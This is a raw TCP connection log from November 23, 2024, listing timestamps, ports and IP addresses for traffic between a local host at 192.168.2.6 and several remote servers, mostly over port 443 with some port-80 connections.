Nov 23, 2024 07:09:27.913600922 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.913698912 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.913707018 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.913754940 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.956954956 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.957020044 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.957073927 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.957083941 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.957125902 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.957125902 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.964226961 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.964276075 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.964302063 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.964308977 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.964360952 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.964385033 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.965981960 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.966008902 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.966125011 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.966125011 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.966134071 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.966176033 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.972651005 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.972693920 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.972745895 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.972754002 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.972790956 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.972904921 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.976454973 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.976480961 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.976542950 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.976548910 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.976572990 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.976608992 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.980937004 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.980982065 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.981043100 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.981050968 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.981084108 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.981098890 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.988008022 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.988034010 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.988094091 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.988100052 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.988122940 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.988140106 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.988277912 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.988322973 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.988344908 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.988360882 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.988379955 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.988400936 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.997243881 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.997287989 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.997376919 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.997385025 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.997430086 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.997472048 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.999372959 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.999393940 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.999465942 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:27.999473095 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:27.999525070 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.004638910 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.004683018 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.004740000 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.004748106 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.004786968 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.004786968 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.009234905 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.009252071 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.009294987 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.009300947 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.009351015 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.009351015 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.012950897 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.012994051 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.013022900 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.013030052 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.013088942 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.013088942 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.013298988 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:28.018891096 CET	80	49778	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:28.019002914 CET	49778	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:28.020371914 CET	49778	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:28.021511078 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.021528006 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.021595955 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.021603107 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.021688938 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.022223949 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.022315025 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.022324085 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.022382975 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.027761936 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.027849913 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.027859926 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.027900934 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.031377077 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.031394958 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.031462908 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.031470060 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.031666994 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.033164978 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.033225060 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.033237934 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.033293962 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.036837101 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.036928892 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:28.038458109 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:28.038467884 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.038852930 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.040038109 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.040097952 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.040112019 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.040169954 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.042912960 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.042928934 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.043014050 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.043021917 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.043129921 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.045156956 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.045248032 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.045254946 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.045296907 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.050318003 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.050390005 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.050399065 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.050525904 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.057076931 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.057132959 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.057143927 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.057208061 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.062325001 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.062453985 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.062460899 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.062633991 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.067357063 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.067426920 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.067435026 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.067477942 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.073259115 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.073350906 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.073358059 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.073419094 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.073858023 CET	443	49761	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.073915005 CET	443	49761	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.074104071 CET	49761	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.074307919 CET	49761	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.074323893 CET	443	49761	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.074330091 CET	49761	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.074336052 CET	443	49761	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.077680111 CET	49779	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.077717066 CET	443	49779	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.077877998 CET	49779	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.079062939 CET	49779	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.079078913 CET	443	49779	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.079998016 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.080089092 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.080101967 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.080164909 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.082236052 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:28.085098982 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.085200071 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.085211992 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.085278034 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.090322971 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.090389967 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.090396881 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.090464115 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.096980095 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.097086906 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.097095013 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.097151041 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.102207899 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.102278948 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.102287054 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.102341890 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.114849091 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:28.139564037 CET	443	49763	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.139622927 CET	443	49763	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.139676094 CET	49763	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.139918089 CET	80	49778	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:28.140187979 CET	49763	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.140187979 CET	49763	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.140197039 CET	443	49763	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.140204906 CET	443	49763	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.144380093 CET	49780	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.144469023 CET	443	49780	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.144541025 CET	49780	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.145395994 CET	49780	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.145435095 CET	443	49780	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.152539015 CET	443	49762	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.152606964 CET	443	49762	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.152702093 CET	49762	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.152800083 CET	49762	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.152800083 CET	49762	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.152817011 CET	443	49762	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.152825117 CET	443	49762	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.154958963 CET	49781	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.155019045 CET	443	49781	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.155297041 CET	49781	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.155473948 CET	49781	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.155494928 CET	443	49781	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.158188105 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.158248901 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.158297062 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.158304930 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.158349991 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.158349991 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.159329891 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.165731907 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.165793896 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.165833950 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.165848017 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.165894985 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.165894985 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.174031019 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.174077988 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.174125910 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.174134016 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.174176931 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.174176931 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.175024033 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.175048113 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.175123930 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.175133944 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.175434113 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.181250095 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.181297064 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.181351900 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.181371927 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.181421995 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.181421995 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.181502104 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.181554079 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.183085918 CET	49756	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.183099031 CET	443	49756	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.183665037 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.183681965 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.183795929 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.183795929 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.183804035 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.183876038 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.191237926 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.191257954 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.191349030 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.191355944 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.191418886 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.197973967 CET	443	49767	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.198034048 CET	443	49767	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.198132038 CET	49767	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.198261023 CET	49767	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.198261023 CET	49767	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.198268890 CET	443	49767	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.198276997 CET	443	49767	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.199628115 CET	443	49768	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.199697018 CET	443	49768	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.199842930 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.199848890 CET	49768	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.199868917 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.199908018 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.199913979 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.199938059 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.199985027 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.200196981 CET	49768	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.200206041 CET	443	49768	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.200380087 CET	49768	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.200385094 CET	443	49768	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.201085091 CET	49782	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.201133013 CET	443	49782	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.201306105 CET	49782	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.201452017 CET	49782	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.201483965 CET	443	49782	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.202450037 CET	49783	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.202498913 CET	443	49783	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.202584982 CET	49783	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.202744961 CET	49783	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:28.202764988 CET	443	49783	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:28.208399057 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.208415985 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.208482027 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.208487988 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.208873034 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.213278055 CET	443	49770	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:28.213551044 CET	49770	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:28.213567019 CET	443	49770	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:28.214020014 CET	443	49770	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:28.214349985 CET	49770	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:28.214428902 CET	443	49770	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:28.216464996 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.216483116 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.216594934 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.216594934 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.216605902 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.216727018 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.225136042 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.225153923 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.225203991 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.225213051 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.225250959 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.225250959 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.230717897 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.230777025 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.230786085 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.230845928 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.233695030 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.233799934 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.233808994 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.233855009 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.237508059 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.237571001 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.237577915 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.237638950 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.242374897 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.242460966 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.242470026 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.242532969 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.246057034 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.246078014 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.246128082 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.246146917 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.246190071 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.246190071 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.246282101 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.246367931 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.246378899 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.246665955 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.251195908 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.251332045 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.251343012 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.251446009 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.255002022 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.255101919 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.255110025 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.255341053 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.258883953 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.258975029 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.258989096 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.259052992 CET	49758	443	192.168.2.6	150.171.27.10
